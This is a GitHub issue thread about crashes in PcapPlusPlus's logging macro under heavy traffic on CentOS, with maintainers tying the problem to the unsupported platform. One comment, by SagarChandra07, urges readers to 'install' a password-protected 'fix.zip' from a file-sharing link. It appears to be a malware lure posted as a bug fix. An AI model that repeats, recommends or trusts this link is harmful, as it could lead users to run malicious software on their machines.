### ISSUE TITLE
Possible crash and performance issues

### ISSUE THREAD

**Issue by gyl30** [seladb/PcapPlusPlus#1595]
### Question

I was using PcapPlusPlus and noticed that my program was occasionally crashing, I looked at the core dump and it showed that internalCreateLogStream was sometimes returning null pointers, causing it to crash out on the next log output. In troubleshooting this problem, I modified the PCPP_LOG macro to block the logging. I found that the modification handled more traffic than before, before the modification it handled about 4.2Gbps of traffic per second, after the modification it could handle 4.8Gbps of traffic. Now my program uses the modified PCPP_LOG macro and no longer logs out and everything runs fine. After noticing that internalCreateLogStream would sometimes return a null pointer, I tried running my program with valgrind, which handles very little traffic because valgrind is very slow, and I didn't notice any unusual memory usage when running the program for a long time with valgrind.

This is my modified PCPP_LOG
![image](https://github.com/user-attachments/assets/56947bb7-a323-4b08-b887-c3e0cd245422)

### Operating systems

Linux

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme

you may need to install the c compiler

**Comment by tigercosmos** [comment]
@gyl30 If you think your patch fixes the issue, could you open a PR? It will be easier to review the patch by the PR flow.

**Comment by gyl30** [comment]
No, no, no, I just blocked the log output and didn't do anything else. We can open this issue and see if others have encountered the same problem. Forgot to mention, I only observed this phenomenon when the traffic was relatively large. The submission of PcapPlusPlus I use is 4cf8ed44f9dd145f874dc1dd747dfefcfcab75be, and the system environment is CentOS 7.9

**Comment by egecetin** [comment]
@gyl30 It is a known issue with CentOS, which is currently not supported. 

cc @seladb @clementperon

**Comment by gyl30** [comment]
I saw the issue https://github.com/seladb/PcapPlusPlus/issues/1200, but wasn't sure if it was the same reason, and since CentOS is now out of our support, I'm closing the issue

**Comment by egecetin** [comment]
@gyl30 I forgot to mention it. Actually, there were random crashes in CI for Centos containers because of logger. Probably your issue corresponds to the CI situation instead of #1200.
